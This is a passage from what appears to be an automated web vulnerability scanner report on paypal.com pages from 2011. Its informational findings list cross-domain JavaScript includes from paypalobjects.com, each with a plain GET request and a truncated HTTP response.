Set-Cookie: consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Mon, 09-Aug-2021 01:22:26 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 01:22:26 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: Apache=10.190.9.182.1313112145907951; path=/; expires=Sun, 04-Aug-41 01:22:25 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24775

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

8.2. https://www.paypal.com/ca/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/ca/cgi-bin/webscr

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/yui/event.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/yui/yahoo.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js

Request

Response

8.3. https://www.paypal.com/ca/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/ca/cgi-bin/webscr

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js

Request

GET /ca/cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:48 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:49 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

8.4. https://www.paypal.com/cgi-bin/helpscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/helpscr

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

GET /cgi-bin/helpscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:47:13 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:47:14 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24766

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

8.5. https://www.paypal.com/cgi-bin/helpscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/helpscr

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/agent.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/curd.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js

Request

GET /cgi-bin/helpscr?cmd=_help&t=escalateTab HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.6. https://www.paypal.com/cgi-bin/helpweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/helpweb

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

GET /cgi-bin/helpweb HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:47:08 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:47:09 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24760

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

8.7. https://www.paypal.com/cgi-bin/helpweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/helpweb

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/hc1.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/yui/element.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js

Request

Response

8.8. https://www.paypal.com/cgi-bin/marketingweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/marketingweb

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

GET /cgi-bin/marketingweb HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:47:18 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:47:19 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

8.9. https://www.paypal.com/cgi-bin/searchscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/searchscr

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

GET /cgi-bin/searchscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:47:15 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:47:16 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24760

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

8.10. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/hostedpayments/hostedpayments.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

Response

8.11. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js

Request

Response

8.12. https://www.paypal.com/express-checkout-buttons previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/express-checkout-buttons

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js

Request

GET /express-checkout-buttons HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:53 GMT
Server: Apache
Set-Cookie: navcmd=xpt%2fMerchant%2fmerchant%2fExpressCheckoutButtonCode-outside; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:54 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2055%20xpt%2fMerchant%2fmerchant%2fExpressCheckoutButtonCode-outside%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2055%20xpt%2fMerchant%2fmerchant%2fExpressCheckoutButtonCode-outside%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2039%20Express%20Checkout%20-%20Button%20Code%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17612

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

8.13. https://www.paypal.com/helpcenter/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/helpcenter/main.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/dojo-04/dojo.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_common.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_search.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/helpcenter/script/atgss_solutionDocumentView.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js

Request

Response

8.14. https://www.paypal.com/helpcenter/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/helpcenter/main.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/js/tns/min/bid.js

Request

GET /helpcenter/main.jsp HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:30 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:31 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24748

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

8.15. https://www.paypal.com/us/cgi-bin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js

Request

Response

8.16. https://www.paypal.com/us/cgi-bin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/

Issue detail

The response dynamically includes the following scripts from other domains:

https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/hostedpayments/hostedpayments.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
